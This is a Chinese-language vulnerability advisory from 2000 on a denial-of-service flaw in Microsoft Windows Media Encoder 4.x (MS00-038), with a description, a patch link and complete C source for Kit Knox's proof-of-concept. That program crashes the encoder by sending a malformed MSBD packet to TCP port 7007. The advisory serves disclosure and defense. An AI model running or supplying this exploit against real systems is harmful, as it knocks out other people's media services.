安全研究

安全漏洞
Microsoft Media Encoder 拒绝服务漏洞

发布日期:2000-06-02
更新日期:2000-06-02

受影响系统:

- Microsoft Windows Media Encoder 4.0
- Microsoft Windows Media Encoder 4.1
     
   + Microsoft Windows NT 4.0
   + Microsoft Windows NT 2000
描述:

Windows Media Encoder是Windows Media Services的一部分。它是用来将数字内容转化为
Windows多媒体格式,以便通过运行在Windows NT或者Windows 2000上的多媒体服务程序发
送。

如果发送一个错误格式的请求给Windows Media Encoder,它就会出错崩溃,不能再将格式
化好的多媒体数据传送给Windoes Media Server.

<* 来源: Kit Knox <kit@rootshell.com>
          Microsoft Security Bulletin (MS00-038)
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


/*
*
* Media Streaming Broadcast Distribution (MSBD)
* Denial of Service Attack
*
* (C) 2000 Kit Knox <kit@rootshell.com> - Public Release: 05/31/00
*
* Causes the Windows Media Encoder to crash with a "Runtime Error!"
*
* "NSREX caused an invalid page fault in module MFC42.DLL at 0177:5f4012a1".
*
* Tested on version 4.1.0.3920 file "NsRex.exe" 998KB 1/11/00.
*
* Official Microsoft patch is available :
*
* http://www.microsoft.com/technet/security/bulletin/ms00-038.asp
*
* Thanks to Microsoft and the WMT group for their prompt attention to this
* matter.
*
*/

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

char bogus_msbd_packet1[] = {
0x4d, 0x53, 0x42, 0x20, 0x06, 0x01, 0x07, 0x00, 0x24, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4e, 0x00,
0x65, 0x00, 0x74, 0x00, 0x00, 0x50, 0x53, 0x00, 0x68, 0x00, 0x6f, 0x00,
0x77, 0x00, 0x00, 0x00
};

int sock;

int main(int argc, char *argv[]) {
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  
  if (argc != 2) {
    fprintf(stderr, "usage: %s <host/ip>\n", argv[0]);
    return(-1);
  }
  
  sock = socket ( AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons(7007);
  he = gethostbyname (argv[1]);
  if (!he) {
    if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
      return(-1);
  } else {
    bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
  }
  if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    fprintf(stderr, "Fatal Error: Can't connect to Windows Media Encoder.\n");
    return(-1);
  }
  write(sock, bogus_msbd_packet1, sizeof(bogus_msbd_packet1));
  for (;;) {
    read(sock, buf, sizeof(buf));
  }
}


建议:

微软已经提供了相应的补丁来解决这个问题,您可以在下列地址下载:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=21596

浏览次数:6615
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障